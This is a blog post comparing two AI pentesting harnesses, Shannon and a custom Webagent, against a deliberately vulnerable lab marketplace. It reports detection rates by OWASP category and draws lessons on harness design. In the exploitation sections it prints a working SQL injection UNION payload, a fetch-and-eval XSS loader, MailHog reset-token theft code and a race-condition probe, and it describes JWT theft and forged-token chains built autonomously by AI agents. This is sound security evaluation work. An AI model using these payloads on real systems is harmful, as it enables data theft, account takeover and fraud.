We gave two AI pentesting harnesses the same model, the same target, and the same vulnerabilities. They came back with very different answers. The one that did better didn't have a smarter brain. It had a human who read the room first.
In Part 1 and Part 2 we tested solo AI coding agents against HireFlow, our vulnerable freelancer marketplace. They found real bugs with zero false positives but missed entire vulnerability classes and never chained findings together. That gave us a feel for the baseline capability: good at local reasoning, bad at coverage and composition.
This post looks at the next step up: multi-agent harnesses on top of the same base model. With the model held constant, how much does the harness around it actually matter?
We compare two harnesses, both running Claude Opus 4.6 under the hood:
- Shannon: an open-source autonomous web pentesting tool (~37.5k GitHub stars). Multi-agent pipeline of five specialists (authentication, injection, XSS, SSRF, authorization). Scored 96.15% on the XBOW benchmark in hint-free source-aware mode.
- Webagent: a custom Claude Code harness we built for this experiment. Ten specialists, one per OWASP Top 10:2025 category, plus a dedicated PoC/validation agent that hunts for cross-category attack chains. Roughly 20 files of prompts and config, built with Claude Code.
Both runs used the same target with the same 47 planted vulnerabilities, the same live application, the same level of access (source code + running instance), and the same base model. The only variable is the harness.
In this article we'll walk through the scoreboard, the per-category breakdown that explains it, where each harness is strongest, and what the gap means for how to design a pentest harness.
Harnesses side-by-side

Both harnesses use the same core idea: break the problem into specialist agents running in parallel, each prompted for a narrow slice of the attack surface. The meaningful difference is what slice each specialist owns.
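In pseudocode terms, both reduce to the same skeleton. This is a hypothetical sketch, not either tool's real code: `runAgent` and the specialist shape are illustrative. Shannon's `specialists` array would hold five attack techniques; Webagent's would hold ten OWASP categories plus the sequential PoC validator.

```js
// Shared skeleton of both harnesses (illustrative; runAgent and the
// specialist object shape are hypothetical, not either tool's real API).
async function runHarness(specialists, target) {
  // Dispatch every specialist in parallel, each with its own narrow prompt.
  const perSpecialist = await Promise.all(
    specialists.map(s =>
      runAgent({ model: 'claude-opus-4-6', prompt: s.prompt, target })
    )
  );
  // Each specialist returns a list of findings; merge them.
  return perSpecialist.flat();
}
```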
The scoreboard
As before, the reports and other deliverables produced by both harnesses can be found in the GitHub repo. The repo also has the full Webagent harness.

Twenty-five percentage points between two multi-agent harnesses running the same base model. That's a much larger gap than single-harness architectural differences usually produce. The rest of this post explains where it came from.
Both harnesses produced exactly one false positive, and they were essentially the same one: a MongoDB injection pattern in the gig search endpoint that matches a textbook NoSQL injection but isn't exploitable because MongoDB 7 disables JavaScript execution by default. Shannon explicitly labelled it FALSE POSITIVE in its own report. Webagent's A05 specialist set confidence to suspected and documented the mitigation. Whether "real vulnerable code mitigated by the database engine's current default config" counts as a finding is a genuine judgement call; both harnesses made the honest call.
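The pattern in question looks roughly like this. This is an illustrative reconstruction, not the actual HireFlow code:

```js
// Illustrative reconstruction of the shared false positive: user input
// reaching a $where clause is textbook NoSQL injection on paper, but
// MongoDB 7's default configuration disables server-side JavaScript,
// so the injected code never executes.
const gigs = await db.collection('gigs').find({
  $where: `this.title.includes('${userQuery}')`, // injectable in principle
}).toArray();                                     // inert on MongoDB 7 defaults
```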
Detection by OWASP category
This is the chart that matters:

Three of Shannon's row entries are 0%. Those three categories are precisely the ones that don't map onto Shannon's five attack-technique specialists. Shannon has no specialist whose job is to look into pipeline config files, grep for missing log statements, or send concurrent requests to probe for race conditions.
Webagent's carve-up (the way the problem space is divided across specialists) is different. It has exactly one specialist per OWASP category. The A03 specialist's entire job is CI/CD and dependency review. The A09 specialist does absence-detection: it enumerates security-relevant events and checks whether each one is logged. The A10 specialist actively races every state-mutating endpoint. Those three specialists alone account for 9 of Webagent's 12-vuln advantage over Shannon.
The model is the same for both tools, so the reasoning capability is identical. The difference is that Webagent has someone pointed at those categories, and Shannon doesn't.
What Shannon does well
Detection rate is one axis. Depth of exploitation is another, and Shannon is the stronger tool on this one. Where Webagent tends to confirm a vulnerability and move on, Shannon keeps pulling on the thread until it has a complete, weaponized exploit chain. Three examples make the difference concrete.
Deeper exploitation payloads
Shannon doesn't stop at "this field is injectable." It produces clean end-to-end exploitation steps, often with working payloads and live confirmation.
SQL injection. Shannon crafted a UNION SELECT payload for the SQL injection in users.service.js:33 that dumped the entire users table in a single request. That's 120 rows including usernames, emails, and bcrypt hashes. It understood the three-column ILIKE injection context and the wrapping subquery that breaks standard `--` comment termination, then built a payload that closes the ILIKE pattern and injects a full UNION SELECT with matching column types:
```
GET /api/users?search=x') UNION SELECT id,username,email,role,password_hash,bio,location,skills,created_at FROM users WHERE (1=1 OR username ILIKE 'x
```
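For the shape of the underlying bug, here's an illustrative reconstruction of the vulnerable query construction. This is not the actual HireFlow source (that's in the repo); the column choices are ours:

```js
// Illustrative reconstruction of the pattern at users.service.js:33 (not
// the actual source). User input is interpolated into a multi-column ILIKE
// filter wrapped in a subquery, so a trailing "--" can't comment out the
// outer query's closing parentheses; the payload has to balance them instead.
const sql = `
  SELECT * FROM (
    SELECT id, username, email FROM users
    WHERE (username ILIKE '%${search}%'
        OR email    ILIKE '%${search}%'
        OR bio      ILIKE '%${search}%')
  ) AS results`;
const rows = await db.query(sql); // string interpolation, no bound parameters
```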
Two-stage data exfiltration. For the HTML injection in the invoice PDF generator, Shannon built a multi-step chain:
- Store a JavaScript SSRF payload in the user's `bio` field
- Set `display_name` to a 138-character loader script that fetches the bio and `eval()`'s it
- Trigger invoice PDF generation; Puppeteer renders the HTML, executes the loader, fetches and executes the full SSRF payload
- The payload does a `fetch()` to an internal service, writes the response data back to the attacker's profile via the app's API
- Attacker reads the exfiltrated data from their own profile

Shannon confirmed the attack by comparing PDF file sizes between normal and injected invoices (24,674 vs 27,529 bytes; the additional DOM elements from executed JavaScript produced measurably larger output).
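The stage-1 loader is the clever part. Here's a hypothetical reconstruction (the real 138-character script and the profile endpoint differ):

```js
// Hypothetical reconstruction of the two-stage loader. display_name holds
// only a tiny fetch-and-eval stub; the bulky SSRF payload hides in bio,
// sidestepping any length limit on the name field. Endpoint is illustrative.
const displayName =
  "<script>fetch('/api/users/42').then(r=>r.json()).then(u=>eval(u.bio))</script>";
```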
Full JWT theft using XSS with browser proof. Shannon used Playwright to simulate a victim visiting the gig page, showed that the injected `<script>` executes in the victim's browser, extracted the JWT from localStorage, and used the stolen JWT to authenticate as the victim: a full account takeover chain end-to-end, in a real browser.
Authorization depth
Shannon reported 18 authorization findings. Its authz specialist systematically enumerated every CRUD operation on every resource type (see AUTHZ-VULN-02 to AUTHZ-VULN-09 in the report). That's eight authorization failures on a single resource type, plus a chain that uses them together: submit a fake deliverable on someone else's milestone → approve it as a different unrelated user → financial disbursement triggered without the contract owner's involvement.
Webagent caught all of these too (via its A01 specialist, which was prompted to do the same per-resource, per-operation enumeration), but Shannon's authz work was clearly the output of a specialist whose sole job was thoroughness on that category. It shows what tight category prompting can do.
Infrastructure testing
Shannon port-scanned the target and found PostgreSQL (5432), MongoDB (27017), and Redis (6379) directly accessible without authentication. It probed MailHog at port 8025 and used it to steal a superadmin's password reset token for a full account takeover. Webagent's A02 specialist covers the same ground (this was an explicit prompt choice after surveying Shannon's output), but Shannon showed this surface matters.
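The MailHog step looks roughly like this. The sketch uses MailHog's real v2 messages API, but the victim address, ports, and reset-link format are assumptions:

```js
// Sketch of the MailHog token theft. MailHog's /api/v2/messages endpoint
// and response shape are real; the victim address and link format here
// are assumptions for illustration.
// 1. Trigger a password reset for the superadmin.
await fetch('http://target:3000/api/auth/forgot-password', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ email: 'superadmin@hireflow.test' }),
});
// 2. Read the reset email straight off the unauthenticated MailHog instance.
const inbox = await (await fetch('http://target:8025/api/v2/messages')).json();
const token = inbox.items[0].Content.Body.match(/token=([\w-]+)/)?.[1];
```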
What Webagent does well
The "hard ceiling" categories
Three OWASP categories defeated every agent in Parts 1 and 2 and continue to defeat Shannon: A03 (supply chain), A09 (logging and monitoring), and A10 (exceptional conditions). These aren't harder vulnerabilities in the reasoning sense. They're harder to find, because finding them means looking somewhere most agents don't look: CI/CD config files, the absence of log statements, and the timing windows around state-mutating endpoints. Webagent broke through all three.
- A03 Supply Chain: 0% → 100%. The A03 specialist reads `package.json`, `Dockerfile`, and similar files, and cross-references concrete CVEs against resolved package versions. It flagged `npm install` instead of `npm ci`, `continue-on-error: true` on the `npm audit` step, and CVEs in jsonwebtoken, multer, mongoose, and puppeteer.
- A09 Logging: 0% → 80%. The A09 specialist does absence-detection as its primary mode. Its prompt explicitly says: "enumerate security-relevant events that should be logged, then check whether each one is." It found missing auth-event logging, cleartext passwords in error-handler `req.body` logging, missing alerting infrastructure, and log injection via unsanitized email.
- A10 Exceptional Conditions: 0% → 40%. The A10 specialist actively races every state-mutating endpoint (see the sketch after this list). It caught wallet withdraw, escrow fund, and escrow release TOCTOUs, all confirmed with live concurrent-request reproduction, driving the wallet to a negative balance.
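The A10 technique is simple to sketch. The endpoint, field names, and token handling below are illustrative:

```js
// Minimal concurrent-request probe of the kind the A10 specialist runs.
// Fire N withdrawals simultaneously; if more than one succeeds against a
// balance that covers only one, the check-then-act window is exploitable.
const N = 10;
const responses = await Promise.all(
  Array.from({ length: N }, () =>
    fetch('http://target:3000/api/wallet/withdraw', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        Authorization: `Bearer ${token}`,
      },
      body: JSON.stringify({ amount: 100 }), // the full balance, each time
    })
  )
);
const accepted = responses.filter(r => r.ok).length;
console.log(`${accepted}/${N} withdrawals accepted`); // >1 confirms the race
```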
A few individual findings are worth calling out:
- Session fixation (A07-E04): Shannon found this one too, but every solo agent missed it. Webagent's A07 specialist catches it.
- JWT `aud`/`iss` validation missing (A07-E06): Shannon missed this. Webagent's A07 specialist explicitly checks for algorithm pinning and claim validation in `jwt.verify` calls (see the sketch after this list).
- CDN script loaded without Subresource Integrity (A08-E01): Shannon missed this. Webagent caught it in three independent specialists (A02, A03, A08) and chained it into a supply-chain compromise path.
- Predictable reset token algorithm: Shannon noted that tokens weren't invalidated after use, which is real but different. Webagent reconstructed the token generation algorithm and brute-forced a live admin takeover by testing roughly 2,000 candidate millisecond timestamps, no email access required.
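Concretely, the A07-E06 check asks whether `jwt.verify` pins the algorithm and validates claims. The option names below are jsonwebtoken's real API; the audience and issuer values are illustrative:

```js
// What a hardened jwt.verify call looks like. HireFlow's calls omit all
// three options, which is what A07-E06 flags.
const jwt = require('jsonwebtoken');
const payload = jwt.verify(token, secret, {
  algorithms: ['HS256'],      // pin: rejects algorithm-confusion tokens
  audience: 'hireflow-api',   // reject tokens minted for another service
  issuer: 'hireflow-auth',    // reject tokens from another issuer
});
```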
Chain-aware validation
The biggest qualitative difference is Webagent's PoC validator, a sequential agent that runs after all specialists complete. Its explicit task was to think in terms of attack paths, not individual findings. It produced five live-verified end-to-end chains:
- Chain A: Hardcoded JWT secret. Forge a superadmin token, get full admin panel access including audit log read and platform settings write. Unauthenticated full compromise. Reproduction is four lines of bash.
- Chain B: Predictable reset token. Blind brute-force takes over `bob.admin@hireflow.com` with no email access and no user interaction. One script, runs in about 90 seconds.
- Chain C: Payment webhook with absent signature. The webhook handler uses `if (signature)` as a guard rather than asserting the signature is present, so any user can credit any wallet any amount, unauthenticated (see the sketch after this list). No idempotency check, so replays multiply the credit. Live demo: credited a freelancer wallet 100,000 cents in two network round-trips.
- Chain D: Stored XSS to persistent account takeover. Inject a payload that reads `localStorage.getItem('hf_token')` into the document title, steal the JWT, authenticate as the victim. The JWT remains valid after the victim logs out, so the takeover is persistent.
- Chain E: CDN supply-chain risk. lodash loaded from cdnjs without Subresource Integrity, no CSP, JWT readable from JS. Any future CDN compromise silently owns every HireFlow session.
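Chain C's guard bug is worth spelling out, because it's a one-keyword mistake. This is a hypothetical Express handler, not HireFlow's actual code:

```js
// Hypothetical handler illustrating Chain C's bug: signature verification
// runs only when the header is present, so omitting the header skips
// verification entirely.
app.post('/api/payments/webhook', (req, res) => {
  const signature = req.headers['x-webhook-signature'];
  if (signature) {                             // BUG: guard, not assertion
    if (!verifySignature(req.body, signature)) return res.sendStatus(401);
  }                                            // no header => falls through
  creditWallet(req.body.walletId, req.body.amount); // runs unauthenticated
  res.sendStatus(200);                         // no idempotency key: replayable
});
// The fix: reject any request that lacks a valid signature, e.g.
// if (!signature || !verifySignature(req.body, signature)) return res.sendStatus(401);
```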
Shannon assembled one multi-step chain (the milestone financial manipulation chain mentioned earlier). Webagent's PoC validator systematically combined findings from every category into goal-oriented attack paths: "full account takeover," "mass financial fraud," "persistent access," "privilege escalation." Its prompt explicitly lists attacker goals and a set of composition heuristics ("XSS + no httpOnly on session + JWT in localStorage = critical takeover") so it won't leave obvious chains on the table.
What Webagent still missed
Seven planted vulns slipped through, and the pattern is the same across all of them: a file or endpoint the relevant specialist didn't open. Two injection variants on admin endpoints (the A05 specialist found the public SQLi and stopped there). One SSRF vector flagged in recon but never probed. One logging gap in a file the auth specialist had touched for a different finding. Three exceptional-conditions bugs in the disputes and analytics modules that no specialist opened.
Every miss is due to coverage, not reasoning. Fixing them is a matter of more exhaustive per-endpoint enumeration within each category, possibly via a coverage-audit step after specialist dispatch. It's not a new capability requirement.
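That coverage-audit step could be as simple as the following. The data shapes are hypothetical:

```js
// Sketch of the coverage-audit step proposed above: diff recon's endpoint
// inventory against what the specialists actually probed, then re-dispatch
// a second, targeted pass over anything untouched.
const probed = new Set(findings.flatMap(f => f.endpointsTested));
const untouched = reconEndpoints.filter(e => !probed.has(e));
if (untouched.length > 0) {
  await dispatchSpecialists({ scope: untouched });
}
```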
Both harnesses have real coverage limitations. Shannon's were structural: entire categories with no specialist pointed at them. Webagent's are tactical: files and endpoints the relevant specialist didn't open. The structural gaps are worse, but the tactical ones are still real.
Lessons learned
The harness should be configured per engagement, not fixed per tool. We initially thought Webagent's target-informed prompts were a problem, that we'd overfit to HireFlow. But that's just what a pentester does at the start of any engagement. They look at the stack, work out which categories and techniques apply, and build a test plan from there. Calling that overfitting is calling competence cheating.
Shannon represents the alternative: one fixed pipeline, applied identically to every target. That's the scanner model: broad, automated, no per-engagement customization, and it scores around 60%. Webagent represents the pentest model: a methodology template configured by a human who understands the target before the AI executes. Two hours of prompt curation (reviewing the stack, selecting relevant checks, framing each specialist's task) buys 25 detection-rate percentage points.
It follows that the senior pentester's job doesn't disappear; it shifts. Less time executing tests, more time configuring the harness: which methodology applies, which attack techniques fit this stack, what an absent log statement looks like in this framework, which workflows could race. Those are scoping decisions that need human judgment about the target. The model handles everything downstream: reading code, crafting payloads, confirming exploitation, assembling chains.
Chain-aware validation is the difference between a bug list and an attack plan. Shannon produces a vulnerability inventory. Webagent's PoC validator produces attack paths. Both are useful and they're different products. The PoC validator isn't expensive to build or run, and it changes the output from "list of issues" to "ways an attacker actually compromises the target." It assembled three of five chains a human pentester would write, missed two obvious compositions, and found two the human didn't think of. Not perfect, but a category shift from anything in Parts 1 or 2.
The Bitter Lesson, applied. Rich Sutton's Bitter Lesson predicts that general methods leveraging computation outperform hand-engineered domain expertise. Shannon's result is consistent with that: elaborate domain-specific scaffolding on a general-purpose model did not significantly improve results over the raw model. Shannon's specialists duplicate what the model already does spontaneously: test injection, auth, XSS, authz. The scaffolding tries to outthink the model, and the model doesn't need the help.
Webagent's +25 points looks like a contradiction but isn't. Webagent doesn't replace the model's reasoning with engineered heuristics. It aims the model: choosing which files to open, which categories to audit, which questions to ask. The model does all the actual reasoning once pointed at the right target. The Bitter Lesson holds: invest in model quality, not in replacing model reasoning with scaffolding. But deciding what to compute remains the human's job. A thin layer that does that well is worth 25 percentage points on the same model.
This maps cleanly onto other domains that use AI: the model is general-purpose, and the human provides task-specific direction. Nobody expects a coding agent to know which feature to build without a spec. A pentest agent shouldn't be expected to know which categories to audit without a test plan.
Objections
"Webagent was designed to ace this specific benchmark." Partly true. We reviewed HireFlow's stack, picked the OWASP categories that applied, and chose testing techniques relevant to Node.js, Express, and React. The specialist prompts themselves contain only standard OWASP and WSTG methodology — no HireFlow-specific file paths, no planted-vuln hints, no endpoint names. But the selection of which standard techniques to include was informed by understanding the target. A genuinely blind prompt set would likely include most of the same checks (they're standard for this stack) but not all, and would include others that don't apply. The detection rate on a blind run would be somewhat lower; how much lower is an open question we haven't measured.
The honest version of this objection is "the 25-point gap reflects two hours of human scoping work, not just harness design." That's correct, and we'd argue it's the post's central finding rather than a weakness. A human pentester does this scoping at the start of every engagement. Shannon doesn't, which is the comparison.
"Shannon wasn't designed for OWASP Top 10." True, Shannon was designed for general web pentesting and optimized for the XBOW benchmark, where it scores 96%. Every tool is optimized for something. The comparison isn't "which tool is better" but "what's the value of configuring a harness per engagement vs. running a fixed pipeline?" Shannon represents the scanner model, and Webagent represents the pentest model. Both are legitimate, they just serve different use cases.
To be fair, Shannon supports per-engagement customization too, and we ran it in its default configuration rather than tuning it for HireFlow. A customized Shannon would close some of the gap, possibly a lot of it. The comparison isn't "Webagent's architecture beats Shannon's." It's "two hours of target scoping beats none, on the same base model." If you customized Shannon for HireFlow with the same scoping work, you'd likely see a similar jump.
"So the +25 points is just benchmark overfitting?" Partly true. But OWASP Top 10 isn't an arbitrary scorecard. It's the industry-standard taxonomy for real web application risk. If a pentest tool doesn't cover supply chain, logging, or error handling, those are genuine blind spots in real engagements, not just missed benchmark points. Shannon genuinely doesn't open CI/CD workflow files, and no amount of model quality fixes that. The blind spots Webagent closes are real even if the way we found them was post-hoc.
"Single runs aren't enough though! What about variance?" Fair point. We ran each harness once. LLM agent results are stochastic, and the 25-point gap could narrow or widen across multiple runs. Our subjective sense from running the agents during development is that the per-category coverage gaps (Shannon's 0% on A03, A09, A10) are structural rather than stochastic. Shannon doesn't have a specialist that opens CI/CD files, so no amount of re-running fixes that. The gap on categories Shannon does cover is more likely to vary run-to-run. We didn't measure this.
Our honest summary is this: configuring a harness per engagement, on the same base model, is worth roughly 25 detection points against a default-configured competitor on the OWASP Top 10. Some of that gap is scoping, some is the PoC validator, some is structural coverage of categories the competitor doesn't touch. The interesting result isn't which tool won, but that the win came from human scoping work upstream of the model, not from architectural sophistication around it.